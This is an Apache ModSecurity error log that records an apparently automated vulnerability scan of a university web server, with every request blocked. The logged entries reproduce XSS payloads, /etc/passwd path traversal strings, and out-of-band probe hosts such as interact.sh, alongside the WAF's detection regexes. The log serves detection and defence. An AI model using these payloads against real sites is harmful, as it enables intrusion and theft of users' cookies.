[Tue Aug 29 11:51:21.547908 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAmQ-wwAAAAb"]
[Tue Aug 29 11:51:21.644684 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAmQ-w0AAAAb"]
[Tue Aug 29 11:51:21.649003 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAm@5xkAAAAH"]
[Tue Aug 29 11:51:22.896009 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAlIBh0AAAAn"]
[Tue Aug 29 11:51:22.915736 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAm80OkAAAAF"]
[Tue Aug 29 11:51:23.003924 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAm91nIAAAAG"]
[Tue Aug 29 11:51:23.567228 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAm7m@MAAAAE"]
[Tue Aug 29 11:51:23.796188 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAm91nQAAAAG"]
[Tue Aug 29 11:51:24.903392 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAnDFykAAAAM"]
[Tue Aug 29 11:51:25.009489 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAmIbQUAAAAo"]
[Tue Aug 29 11:51:26.780984 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAmHd-IAAAAz"]
[Tue Aug 29 11:51:26.792332 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAmLPS4AAAAN"]
[Tue Aug 29 11:51:26.884974 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAnHQeYAAAAT"]
[Tue Aug 29 11:51:27.027579 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAkyyFcAAAAW"]
[Tue Aug 29 11:51:27.598520 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAm80PcAAAAF"]
[Tue Aug 29 11:51:28.865750 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAmLPTYAAAAN"]
[Tue Aug 29 11:51:28.913707 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAnGkJAAAAAR"]
[Tue Aug 29 11:51:28.933599 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAnGkJEAAAAR"]
[Tue Aug 29 11:51:29.551630 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAlUljUAAAA0"]
[Tue Aug 29 11:51:30.561459 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAlUljcAAAA0"]
[Tue Aug 29 11:51:30.587898 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAjdQVUAAAAZ"]
[Tue Aug 29 11:51:30.757350 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAkr0HAAAAAC"]
[Tue Aug 29 11:51:31.548694 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnIlhoAAAAV"]
[Tue Aug 29 11:51:31.549262 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15U8Co-f0AAAm7m-sAAAAE"]
[Tue Aug 29 11:51:34.425124 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zUAAAAb"]
[Tue Aug 29 11:51:34.802676 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAngCTgAAAAP"]
[Tue Aug 29 11:51:34.936139 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAngCT0AAAAP"]
[Tue Aug 29 11:51:34.959164 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15VsCo-f0AAAnf3kcAAAAM"]
[Tue Aug 29 11:51:34.992252 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15VsCo-f0AAAnd2@EAAAAI"]
[Tue Aug 29 11:51:35.675219 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3lYAAAAM"]
[Tue Aug 29 11:51:39.535003 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnZfD8AAAAG"]
